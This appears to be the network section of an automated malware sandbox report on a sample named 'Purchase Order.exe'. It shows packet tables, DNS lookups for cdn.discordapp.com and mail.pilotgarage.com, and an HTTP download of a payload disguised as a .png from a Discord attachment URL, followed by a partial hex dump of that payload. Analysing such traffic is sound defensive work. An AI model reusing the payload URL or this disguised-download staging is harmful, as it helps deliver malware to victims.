                                                                                  May 2, 2022 13:01:23.706151962 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706218958 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706301928 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706330061 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706355095 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706406116 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706502914 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706617117 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706645012 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706674099 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706697941 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706729889 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:23.706814051 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706844091 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706867933 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.706929922 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.707062960 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.707189083 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.707294941 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.707381010 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.707467079 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.739447117 CEST44349717204.79.197.200192.168.2.4
                                                                                  May 2, 2022 13:01:23.739667892 CEST49717443192.168.2.4204.79.197.200
                                                                                  May 2, 2022 13:01:34.042655945 CEST49757443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:34.042717934 CEST4434975740.126.31.4192.168.2.4
                                                                                  May 2, 2022 13:01:34.042870045 CEST49757443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:34.043294907 CEST49757443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:34.043338060 CEST4434975740.126.31.4192.168.2.4
                                                                                  May 2, 2022 13:01:34.087539911 CEST49758443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:34.087601900 CEST4434975840.126.31.4192.168.2.4
                                                                                  May 2, 2022 13:01:34.087881088 CEST49758443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:34.088130951 CEST49758443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:34.088150978 CEST4434975840.126.31.4192.168.2.4
                                                                                  May 2, 2022 13:01:35.040163040 CEST49759443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:35.040222883 CEST4434975940.126.31.4192.168.2.4
                                                                                  May 2, 2022 13:01:35.040323019 CEST49759443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:35.040956020 CEST49759443192.168.2.440.126.31.4
                                                                                  May 2, 2022 13:01:35.040983915 CEST4434975940.126.31.4192.168.2.4
                                                                                  May 2, 2022 13:01:43.776541948 CEST4967380192.168.2.493.184.220.29
                                                                                  May 2, 2022 13:01:43.776634932 CEST4967280192.168.2.48.248.119.254
                                                                                  May 2, 2022 13:01:44.087126970 CEST4967380192.168.2.493.184.220.29
                                                                                  May 2, 2022 13:01:44.149612904 CEST4967280192.168.2.48.248.119.254
                                                                                  May 2, 2022 13:01:44.790230989 CEST4967380192.168.2.493.184.220.29
                                                                                  May 2, 2022 13:01:44.852957010 CEST4967280192.168.2.48.248.119.254
                                                                                  May 2, 2022 13:01:46.087347984 CEST4967380192.168.2.493.184.220.29
                                                                                  May 2, 2022 13:01:46.149682045 CEST4967280192.168.2.48.248.119.254
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 2, 2022 13:01:58.697439909 CEST6050653192.168.2.48.8.8.8
                                                                                  May 2, 2022 13:01:58.719662905 CEST53605068.8.8.8192.168.2.4
                                                                                  May 2, 2022 13:02:39.955002069 CEST6490953192.168.2.48.8.8.8
                                                                                  May 2, 2022 13:02:40.027796030 CEST53649098.8.8.8192.168.2.4
                                                                                  May 2, 2022 13:03:02.662627935 CEST5406953192.168.2.48.8.8.8
                                                                                  May 2, 2022 13:03:02.685784101 CEST53540698.8.8.8192.168.2.4
                                                                                  May 2, 2022 13:03:15.053272963 CEST5774753192.168.2.48.8.8.8
                                                                                  May 2, 2022 13:03:15.073618889 CEST53577478.8.8.8192.168.2.4
                                                                                  May 2, 2022 13:03:39.567951918 CEST5006153192.168.2.48.8.8.8
                                                                                  May 2, 2022 13:03:39.638019085 CEST53500618.8.8.8192.168.2.4
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  May 2, 2022 13:01:58.697439909 CEST192.168.2.48.8.8.80xd8a9Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:02:39.955002069 CEST192.168.2.48.8.8.80x8306Standard query (0)mail.pilotgarage.comA (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:02.662627935 CEST192.168.2.48.8.8.80x2c57Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:15.053272963 CEST192.168.2.48.8.8.80x1f84Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:39.567951918 CEST192.168.2.48.8.8.80x4e11Standard query (0)mail.pilotgarage.comA (IP address)IN (0x0001)
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  May 2, 2022 13:01:58.719662905 CEST8.8.8.8192.168.2.40xd8a9No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:01:58.719662905 CEST8.8.8.8192.168.2.40xd8a9No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:01:58.719662905 CEST8.8.8.8192.168.2.40xd8a9No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:01:58.719662905 CEST8.8.8.8192.168.2.40xd8a9No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:01:58.719662905 CEST8.8.8.8192.168.2.40xd8a9No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:02:02.778625011 CEST8.8.8.8192.168.2.40x7c77No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                  May 2, 2022 13:02:40.027796030 CEST8.8.8.8192.168.2.40x8306No error (0)mail.pilotgarage.com5.250.241.50A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:02.685784101 CEST8.8.8.8192.168.2.40x2c57No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:02.685784101 CEST8.8.8.8192.168.2.40x2c57No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:02.685784101 CEST8.8.8.8192.168.2.40x2c57No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:02.685784101 CEST8.8.8.8192.168.2.40x2c57No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:02.685784101 CEST8.8.8.8192.168.2.40x2c57No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:15.073618889 CEST8.8.8.8192.168.2.40x1f84No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:15.073618889 CEST8.8.8.8192.168.2.40x1f84No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:15.073618889 CEST8.8.8.8192.168.2.40x1f84No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:15.073618889 CEST8.8.8.8192.168.2.40x1f84No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:15.073618889 CEST8.8.8.8192.168.2.40x1f84No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                  May 2, 2022 13:03:39.638019085 CEST8.8.8.8192.168.2.40x4e11No error (0)mail.pilotgarage.com5.250.241.50A (IP address)IN (0x0001)
                                                                                  • cdn.discordapp.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.449760162.159.129.233443C:\Users\user\Desktop\Purchase Order.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2022-05-02 11:02:01 UTC0OUTGET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1
                                                                                  Host: cdn.discordapp.com
                                                                                  Connection: Keep-Alive
                                                                                  2022-05-02 11:02:01 UTC0INHTTP/1.1 200 OK
                                                                                  Date: Mon, 02 May 2022 11:02:01 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 1250816
                                                                                  Connection: close
                                                                                  CF-Ray: 70504320dcc79b4f-FRA
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 10493
                                                                                  Cache-Control: public, max-age=31536000
                                                                                  ETag: "8b4e3118a9ad10f525d58287a5b3d59e"
                                                                                  Expires: Tue, 02 May 2023 11:02:01 GMT
                                                                                  Last-Modified: Mon, 02 May 2022 07:20:29 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: HIT
                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  x-goog-generation: 1651476029852442
                                                                                  x-goog-hash: crc32c=hwhX1A==
                                                                                  x-goog-hash: md5=i04xGKmtEPUl1YKHpbPVng==
                                                                                  x-goog-metageneration: 1
                                                                                  x-goog-storage-class: STANDARD
                                                                                  x-goog-stored-content-encoding: identity
                                                                                  x-goog-stored-content-length: 1250816
                                                                                  X-GUploader-UploadID: ADPycdvlLx3JracfYsvVBAgmX4a-C82nsbcn_2Up0RFqabos6mHUOzxh5QL4HNlUSOsot6bjxrgVH3mfckuvec55iPKWOozK8RZR
                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bA8mo1PFpeBHut5egOzHQtM9kHe1T9DgmNZM3Y1G04Igat6SwDZpQJeT1P2X5TmwAW7j9YZ%2B%2FYmHwzDDYKxDc%2B9Z7vZRwSYsNCkxjsDoZWgShTpXS2E0PVd5B1toS6fSUoC3Pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  2022-05-02 11:02:01 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:02:01 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:02:01 UTC2INData Raw: 3f 1f dd 48 64 00 01 00 00 1f dd 48 64 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 42 00 00 00 00 00 00 00 00 00 00 03 42 00 13 40 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: ?HdHdOFNI_NOISREV_SV4BB@XH0
                                                                                  2022-05-02 11:02:01 UTC4INData Raw: 02 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 13 00 00 00 01 05 61 33 61 30 35 64 31 31 66 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 51 00 00 00 02 0c 00 00 00 00 00 00 00 01 ff ff ff ff 00 00 00 01 00 43 0b 00 00 00 01 08 00 00 00 01 00 00 00 2d 0f 00 00 00 26 09 00 00 00 01 00 00 00 2c 11 74 74 20 6d 6d 3a 68 07 00 00 00 55 06 6d 6d 3a 48 04 00 00 00 54 06 74 74 20 6d 6d 3a 68 68 08 00 00 00 53 06 00 00 00 27 09 00 00 00 04 00 00 00 2b 11 00 00 00 23 09 00 00 00 01 00 00 00 2a 11 64 64 2d 4d 4d 2d 79 79 79 79 0a 00 00 00 50 06 00 00 00 24 09 00 00 00 02 00 00 00 29 11
                                                                                  Data Ascii: eziS.gniwarD.metsySa3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsySQC-&,tt mm:hUmm:HTtt mm:hhS'+#*dd-MM-yyyyP$)
                                                                                  2022-05-02 11:02:01 UTC5INData Raw: 52 73 69 5f 6d 0c 73 72 61 64 6e 65 6c 61 43 6c 61 6e 6f 69 74 70 6f 11 73 65 6d 61 4e 61 72 45 68 73 69 6c 67 6e 45 76 65 72 62 62 61 5f 6d 17 73 65 6d 61 4e 61 72 45 76 65 72 62 62 61 5f 6d 10 73 65 6d 61 4e 61 72 65 5f 6d 0a 73 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68 53 6c 6c 61 14 73 6e 72 65 74 74 61 50 65 74 61 44 67 6e 6f 4c 6c 6c 61 13 73 6e 72 65 74 74 61 50 65 74 61 44 74 72 6f 68 53 6c 6c 61 14 73 6e 72 65 74 74 61 50 68 74 6e 6f 4d 72 61 65 59 6c 6c 61 14 6e 72 65 74 74 61 50 65 6d 69 54 74 72 6f 68 73 10 6e 72 65 74 74 61 50 65 6d 69 54 67 6e 6f 6c 0f 6e 72 65 74 74 61 50 68 74 6e 6f 4d 72 61 65 79 10 6e 72 65 74 74 61 50 65 74 61 44 74 72 6f 68 73 10 6e 72 65 74 74 61 50 65 74
                                                                                  Data Ascii: Rsi_msradnelaClanoitposemaNarEhsilgnEverbba_msemaNarEverbba_msemaNare_msnrettaPemiTgnoLllasnrettaPemiTtrohSllasnrettaPetaDgnoLllasnrettaPetaDtrohSllasnrettaPhtnoMraeYllanrettaPemiTtrohsnrettaPemiTgnolnrettaPhtnoMraeynrettaPetaDtrohsnrettaPet
                                                                                  2022-05-02 11:02:01 UTC6INData Raw: 75 63 0e 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 79 63 6e 65 72 72 75 63 18 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 16 72 6f 74 61 72 61 70 65 53 70 75 6f 72 47 72 65 62 6d 75 6e 14 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 72 65 62 6d 75 6e 16 6e 67 69 53 65 76 69 74 61 67 65 6e 0c 6e 67 69 53 65 76 69 74 69 73 6f 70 0c 73 65 7a 69 53 70 75 6f 72 47 74 6e 65 63 72 65 70 11 73 65 7a 69 53 70 75 6f 72 47 79 63 6e 65 72 72 75 63 12 73 65 7a 69 53 70 75 6f 72 47 72 65 62 6d 75 6e 10 00 00 00 22 6f 66 6e 49 74 61 6d 72 6f 46 72 65 62 6d 75 4e 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 25 00 00 00 04 04 00 00 00 7f 00 00 00 00 00 00 00 00 07 09 00 00 00 07 09 01 2c 01 00 00 00 08 06 08 01 08 01 00 00
                                                                                  Data Ascii: ucrotarapeSlamiceDycnerrucrotarapeSpuorGycnerrucrotarapeSpuorGrebmunrotarapeSlamiceDrebmunngiSevitagenngiSevitisopseziSpuorGtnecrepseziSpuorGycnerrucseziSpuorGrebmun"ofnItamroFrebmuN.noitazilabolG.metsyS%,
                                                                                  2022-05-02 11:02:01 UTC8INData Raw: 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 02 02 00 02 02 00 02 02 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 00 00 00 00 00 00 00 00 00 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 02 01 00 01 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 01 00 01 02 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 00 01 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 02 01 00 01 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 02 01 00 01 02 03 03
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:02:01 UTC9INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2022-05-02 11:02:01 UTC10INData Raw: 37 66 35 66 33 30 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 20 2c 65 7a 69 53 2e 67 6e 69 77 61 72 44 2e 6d 65 74 73 79 53 66 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 62 69 6c 72 6f 63 73 6d 20 2c 6f 66 6e 49 65 72 75 74 6c 75 43 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 6d 39 38 30 65 34 33 39 31 36 35 63 35 61 37 37 62 3d 6e 65 6b 6f 54 79 65 4b 63 69 6c 62 75 50 20 2c 6c 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30
                                                                                  Data Ascii: 7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsyS ,eziS.gniwarD.metsySf980e439165c5a77b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,bilrocsm ,ofnIerutluC.noitazilabolG.metsySm980e439165c5a77b=nekoTyeKcilbuP ,lartuen=erutluC ,0
                                                                                  2022-05-02 11:02:01 UTC12INData Raw: cc 98 b8 1a 00 c7 21 2e d6 23 0c 07 7f 88 61 48 c6 44 71 ce 3b 18 0e c3 41 bb 3d 9b 27 a9 92 5f ee d7 28 01 20 5d db 83 41 bb 31 99 00 6a 8a 48 9b 88 b1 bc 77 5b 74 9d 0b 7a 37 15 4c d1 71 97 48 e0 7e 42 58 dc 85 68 12 9b 86 ee 38 8f 08 38 30 c7 b1 55 1d 14 a0 69 0f 09 a0 d2 13 71 dc ee d2 91 74 bc d9 f2 6a be 8e 96 59 33 ed 38 3c 76 5f a8 b8 0b ca 5e 5f 1a e8 2c 6a 74 3f bf ac d6 bb 77 7d cb 66 47 7d 52 d4 37 7f 96 2c 39 cb ff d4 19 65 07 16 5e 4a df 74 09 40 d9 fd 6c d4 b3 f3 76 79 c4 38 f6 0d af e1 94 97 66 26 7b 99 5e 27 92 52 07 bc ef b9 2d 3d b6 1c 38 10 3a 55 7e b5 2d 97 93 d7 98 f1 42 b0 65 00 26 c7 f2 05 ba 96 b5 a0 fb 43 17 57 6e 7b 7b 93 97 44 60 8a cb 46 bb 39 9f 04 2f 14 f7 76 a5 c7 78 3f ca 43 98 77 c8 ca 0e 17 c6 49 6b 44 71 2d 96 22 ce fe
                                                                                  Data Ascii: !.#aHDq;A='_( ]A1jHw[tz7LqH~BXh880UiqtjY38<v_^_,jt?w}fG}R7,9e^Jt@lvy8f&{^'R-=8:U~-Be&CWn{{D`F9/vx?CwIkDq-"
                                                                                  2022-05-02 11:02:01 UTC13INData Raw: ee be 92 5a 2f 07 c0 84 b7 47 82 f8 7d 01 aa 35 88 70 00 e3 e7 6c b6 ea 4f b2 06 ca 01 f1 c6 58 ad fa e1 7f a1 c5 bb 73 39 25 1c 89 64 ff b7 10 54 16 59 a2 8d 9c 34 94 e3 12 96 f3 a4 23 36 8e 29 24 b9 86 89 92 4b 50 b9 f3 67 59 70 1f 9f df 1f 37 95 c6 49 97 e5 fe 81 7d cd 9e aa 40 50 c9 31 c8 df e6 27 0c c2 7a 78 f0 92 4a ef 78 29 9b 4b af 16 e6 3e 9e ca 17 51 74 c0 2a e8 a5 6f 94 e6 aa da 14 1a fd fe a5 ec 1a f8 b1 96 31 98 72 60 2a 98 0a b3 2b e1 48 e5 7f a3 7a e0 ee 63 2d ec a0 08 cb 3d 59 3d aa 93 ee f5 fc e4 85 ce aa 1d 7f f0 7f 87 86 c1 c1 ab 5a 9f 41 06 d8 7b ad d8 e9 1f f5 bc ef 25 2b e4 ea 54 91 86 e9 45 d4 45 e8 87 17 8b 34 c5 18 1b b5 59 ae 78 41 f3 24 1f 52 fa 3c 28 65 6b b5 25 11 38 3f 05 e6 64 01 39 49 d6 d7 d9 6e 8e b3 9d 76 f4 82 46 fa c4
                                                                                  Data Ascii: Z/G}5plOXs9%dTY4#6)$KPgYp7I}@P1'zxJx)K>Qt*o1r`*+Hzc-=Y=ZA{%+TEE4YxA$R<(ek%8?d9InvF
                                                                                  2022-05-02 11:02:01 UTC14INData Raw: 63 e4 bd aa 31 cc 6f d6 3e 1c cd 07 4c 14 48 97 02 52 92 8e a2 7f ee 3b 74 c9 c0 27 f7 20 dc 73 b9 5a ff 04 db 51 e3 b8 93 fb a6 81 b0 21 63 19 c6 52 98 58 0a bf b1 ec 49 2a 6f 3b e3 ad b6 a6 a0 9c c3 a1 d2 30 02 16 83 a7 d6 cb f0 10 24 11 c7 2d 36 d1 13 e7 d9 8d 21 f7 60 ab 86 e6 f9 2a 84 84 29 76 0f b1 39 38 e4 57 d6 7a ff d0 23 2e 9f 26 ef 0f 8c a8 c5 1c 9c aa 8c 3c 39 a8 51 43 61 9d 91 a6 b1 42 8f 0e 14 6a f5 20 7e dd d5 57 20 3f 03 ea 56 a6 22 28 6b 5d bc ba 64 90 7e 31 76 49 64 e7 43 9e 79 4a 02 04 54 7f ae 39 36 e0 41 06 57 7d 5f 59 c0 8d 91 39 c2 4c 20 8d e2 7d f0 ea 05 55 e2 43 cb 83 9b d1 1f cb 80 2e 9a d7 d1 78 79 36 64 cb 5b 9f 5b ae 4f 05 40 5f 2a 8c 99 24 31 4e dd 2a ea b2 ac 61 a1 2a b6 a3 da 57 a9 39 02 be 39 40 55 63 f0 c7 0a f1 38 5a d7
                                                                                  Data Ascii: c1o>LHR;t' sZQ!cRXI*o;0$-6!`*)v98Wz#.&<9QCaBj ~W ?V"(k]d~1vIdCyJT96AW}_Y9L }UC.xy6d[[O@_*$1N*a*W99@Uc8Z
                                                                                  2022-05-02 11:02:01 UTC16INData Raw: 22 57 b8 d3 31 56 f5 10 98 56 97 c4 67 a3 61 a4 b3 84 b6 01 4d 7c 6a c0 b9 84 7f 9b c4 5e 00 b0 f1 8c 9c f9 56 b0 0e 78 29 ef c6 3b ce 5d b7 2b 1f f8 40 62 7f ef 9c 59 f1 bc 4b 49 70 e4 86 4e 1a 23 b0 e9 a9 dc 0d 7f cc 33 4a a7 f9 7b 19 a1 11 57 82 cb 29 85 0d a5 6e 44 a7 96 ab 95 72 22 03 14 5a 72 6e b7 93 05 5f d4 76 dd 32 48 3d a1 54 22 d8 7a 5a 40 5a f8 a1 d2 32 e7 f3 3d cf 98 e9 1b f5 4d d9 c4 00 c6 10 5c 73 87 41 25 97 8f 25 3e 78 c8 b5 45 97 94 45 d4 26 86 3a 33 18 25 bd fd 70 28 82 31 ee a6 67 77 bd 1f 15 49 d1 5b e8 eb ec 54 84 b8 83 96 7e b0 4a 71 95 25 15 8b c5 0e fc d2 02 d5 27 ae 0d 35 1f 30 48 5e c2 2e 93 e8 0f 76 38 f3 09 10 7b 16 30 79 cd b9 42 23 2b 97 e6 11 8c 28 8e e9 fa b0 53 74 84 f7 a7 fa bd de b9 a2 d4 b4 5c 56 73 b8 4f c8 63 fb 8b
                                                                                  Data Ascii: "W1VVgaM|j^Vx);]+@bYKIpN#3J{W)nDr"Zrn_v2H=T"zZ@Z2=M\sA%%>xEE&:3%p(1gwI[T~Jq%'50H^.v8{0yB#+(St\VsOc
                                                                                  2022-05-02 11:02:01 UTC17INData Raw: fd 4b db bd 47 99 f4 6f 7f 3f 60 1c db f3 51 a4 65 9a 5b 43 f7 25 fc 63 34 4e ed ba f4 28 5f a9 32 60 68 e7 14 3a ba b0 e5 1c a0 fe 10 cb 5c 57 cd b8 90 65 38 30 d1 66 b3 39 b2 c1 47 dd f3 01 bb 2b 00 a1 ac 63 5e dd 35 52 03 5f 91 da e9 6b 6a 6e 31 7b 78 03 8e 6c 48 30 2b d1 2d b5 79 5d 7d da ab d5 ca 98 b2 66 08 1d 59 66 a9 b9 e5 5e 1f 9b 47 f9 a8 3d 83 e2 85 55 aa d2 93 d0 4c 23 e5 f5 a1 94 6c d2 24 a5 2b 1c 7a 9c 79 f0 29 f0 67 a4 a4 3d b7 48 e3 e8 ef e7 5e 94 54 7d 8f 86 9e 5c 30 da de 13 89 72 96 bd e3 39 4c c5 89 71 46 f5 16 dc a3 e0 ef 6d 67 95 20 b5 f0 21 28 87 9a 4a 15 c2 33 7b 85 c6 bf 66 64 85 37 31 c8 2c 6e 25 f3 b7 5a 67 de 7f fa fc ed 2b 0c d2 bf 64 dd 3a fe 8f 91 c4 93 df c4 5a 1d 83 d8 0e ac f3 46 28 58 d0 4c 0a a4 d3 42 9c 44 5f 76 af 7e
                                                                                  Data Ascii: KGo?`Qe[C%c4N(_2`h:\We80f9G+c^5R_kjn1{xlH0+-y]}fYf^G=UL#l$+zy)g=H^T}\0r9LqFmg !(J3{fd71,n%Zg+d:ZF(XLBD_v~
